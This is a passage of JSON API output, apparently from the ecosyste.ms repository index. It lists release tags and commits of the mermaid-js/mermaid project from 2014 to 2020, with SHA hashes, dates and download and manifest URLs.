os.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce/manifests"},{"name":"8.4.6","sha":"4805394e612c836bf27710794ce6f9aa86b7ac60","kind":"tag","published_at":"2020-01-22T18:53:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6/manifests"},{"name":"untagged-f43366252632a1a42020","sha":"e0d16dcb22333f967e172e1f5b78af4baf6c0eff","kind":"commit","published_at":"2020-01-11T09:07:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f43366252632a1a42020","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f43366252632a1a42020","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-f43366252632a1a42020","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020/manifests"},{"name":"8.4.4","sha":"0544dbe89196f2709ad714432ed4f6c9883fa023","kind":"commit","published_at":"2019-12-14T08:27:38.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4/manifests"},{"name":"8.4.3","sha":"cb07a729e5e11d58ee1bce43dc041b76a610bde2","kind":"commit","published_at":"2019-11-30T23:42:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3/manifests"},{"name":"8.4.2","sha":"1ecf0f4c234a773c735dc56804233a66377db3b3","kind":"commit","published_at":"2019-11-07T20:16:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2/manifests"},{"name":"8.4.1","sha":"a3017b8456cfafb446aedb9ad549328a69e24984","kind":"commit","published_at":"2019-11-06T18:52:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1/manifests"},{"name":"8.4.0","sha":"0157f665a305b0616e7932360a2f9fb2fa154668","kind":"commit","published_at":"2019-10-19T14:59:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0/manifests"},{"name":"8.3.0","sha":"0200fef389e3b0988557028d6edd03262ceeefba","kind":"commit","published_at":"2019-09-19T05:19:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0/manifests"},{"name":"8.2.6","sha":"2cb54293f80af8c07bee8b91cfb04388e786fb83","kind":"commit","published_at":"2019-09-01T09:18:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6/manifests"},{"name":"8.2.5","sha":"34d3b852271ea3b7ebf58553334ad3d5645c15f1","kind":"commit","published_at":"2019-08-26T18:23:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5/manifests"},{"name":"8.2.4","sha":"a3142aad69167bc6b690e5a77550a869c86d79cd","kind":"commit","published_at":"2019-08-20T18:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4/manifests"},{"name":"8.2.3","sha":"5b85fe9293493bc68d105cf78192ac475c9c6d0e","kind":"commit","published_at":"2019-07-25T19:00:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3/manifests"},{"name":"8.2.2","sha":"cf686c445c069bd3137560f2ab3a30bfb7bc9dc5","kind":"commit","published_at":"2019-07-22T12:23:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2/manifests"},{"name":"8.2.1","sha":"5dd392127f1121dea2a05fb0a535101c085496b2","kind":"commit","published_at":"2019-07-21T09:23:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1/manifests"},{"name":"8.2.0","sha":"92ac7d7c2477071a7279927b023872d866571e28","kind":"commit","published_at":"2019-07-17T16:14:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0/manifests"},{"name":"8.1.0","sha":"95967151ae61be7db104564dbf29db81a4415f11","kind":"commit","published_at":"2019-06-25T08:24:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0/manifests"},{"name":"7.0.5","sha":"f6b5c704e8939db0047e7a70ab3b6109af261fb0","kind":"commit","published_at":"2017-09-01T10:34:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5/manifests"},{"name":"7.0.3","sha":"1076d671374898a1e75b778911832da01f57b88f","kind":"commit","published_at":"2017-06-04T04:13:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3/manifests"},{"name":"7.0.2","sha":"5f5c8a2df00d93d2a9ed48fa868d1a4ded761457","kind":"commit","published_at":"2017-06-01T05:38:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2/manifests"},{"name":"7.0.0","sha":"fb70b9742a22f8673cdd3a8d74fcbbc6ea03b432","kind":"commit","published_at":"2017-01-29T11:14:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0/manifests"},{"name":"6.0.0","sha":"b8d3b01f64f30fa1dd46f7de160e8f80147010f3","kind":"commit","published_at":"2016-05-29T17:25:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/6.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0/manifests"},{"name":"0.5.8","sha":"6ee298dc7d5913ea065b92e736184edcc05b6c74","kind":"commit","published_at":"2016-01-27T14:02:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8/manifests"},{"name":"0.5.7","sha":"f005c72669c0e41bac6f42f81a6805a923dacbf0","kind":"commit","published_at":"2016-01-25T17:59:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7/manifests"},{"name":"0.5.6","sha":"425a83c0da996ba565c2b840993fbf61a725a84a","kind":"commit","published_at":"2015-11-22T17:55:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6/manifests"},{"name":"0.5.5","sha":"c9d29c16e20783700701a340540959ed5680236c","kind":"commit","published_at":"2015-10-21T19:14:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5/manifests"},{"name":"0.5.4","sha":"ecb12ae2a8bc7f8c7077737713cf94acffac5c41","kind":"commit","published_at":"2015-10-19T20:08:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4/manifests"},{"name":"0.5.3","sha":"16906ee242fcaf51d77f082fc3e7167241432ab0","kind":"commit","published_at":"2015-10-04T21:28:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3/manifests"},{"name":"0.5.2","sha":"a611ff3abd70103fc9ac44af63103e9f9d5991c9","kind":"commit","published_at":"2015-10-04T21:09:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2/manifests"},{"name":"0.5.1","sha":"0dc983d04ab9400e604a460eea3a409570961ab2","kind":"commit","published_at":"2015-06-21T15:26:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1/manifests"},{"name":"0.5.0","sha":"999430f9e0c18ca830f497817c8701cfbd2046f9","kind":"commit","published_at":"2015-06-07T15:05:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0/manifests"},{"name":"0.4.0","sha":"cc1a4be15a5ed3726a121a5fce75a561ddca5e1d","kind":"commit","published_at":"2015-03-01T15:48:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0/manifests"},{"name":"0.3.5","sha":"2512666f493e8455f6534f216d42f00a7c9e526f","kind":"commit","published_at":"2015-02-15T18:34:18.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5/manifests"},{"name":"0.3.4","sha":"074a819ca8d3d98cdef3144d091a63f919d3a55d","kind":"commit","published_at":"2015-02-15T17:11:46.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4/manifests"},{"name":"0.3.3","sha":"5452be9feda681abb48d6364fbca662c6af0215d","kind":"commit","published_at":"2015-01-25T15:41:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3/manifests"},{"name":"0.3.2","sha":"911cd09dd875deb50f65a98baf21f65ab2cbf82b","kind":"commit","published_at":"2015-01-11T14:02:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2/manifests"},{"name":"0.3.1","sha":"222a6e06827f194d9368d3a790dbe6cc53341788","kind":"commit","published_at":"2015-01-05T14:32:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1/manifests"},{"name":"0.3.0","sha":"c50178c640a4f6c99539bcc64cf029e94263fdb4","kind":"commit","published_at":"2014-12-22T12:52:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0/manifests"},{"name":"0.2.16","sha":"5712c6de7bdca29a2950df1e6e0342ca8f0323a4","kind":"commit","published_at":"2014-12-15T18:35:09.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.16","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16/manifests"},{"name":"0.2.15","sha":"6988dea3535919faa599537c31c5d94a01a30479","kind":"commit","published_at":"2014-12-05T09:50:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.15","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15/manifests"},{"name":"0.2.14","sha":"dd26960852b4cba1d60e6bb2e508c0af6dd3d4b4","kind":"commit","published_at":"2014-12-03T18:35:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.14","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14/manifests"},{"name":"0.2.13","sha":"fe2f3b403d1310c2a6e09aac24d0fdd257c2ddcf","kind":"commit","published_at":"2014-12-03T18:29:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.13","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13/manifests"},{"name":"0.2.10","sha":"15023461722117d1429bbc0eb6030ca35aa51d53","kind":"commit","published_at":"2014-12-01T20:12:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10/manifests"},{"name":"0.2.9","sha":"1a7997cdef01882ea7b46948d58625e904a09094","kind":"tag","published_at":"2014-12-01T20:04:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9/manifests"},{"name":"0.2.8","sha":"1d2327c4c2ae60692f9bfe8b4d19ea195ebcbb04","kind":"tag","published_at":"2014-12-01T09:01:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8/manifests"},{"name":"0.2.7","sha":"cbd41dbb1b4875aa3254babca694844908a1ecf7","kind":"tag","published_at":"2014-12-01T08:30:27.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7/manifests"},{"name":"0.2.6","sha":"9a35844731426e1f74f64d272ae6398f20424457","kind":"commit","published_at":"2014-11-27T20:28:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.6","html_url":"https://github.com/mermaid-js/mermaid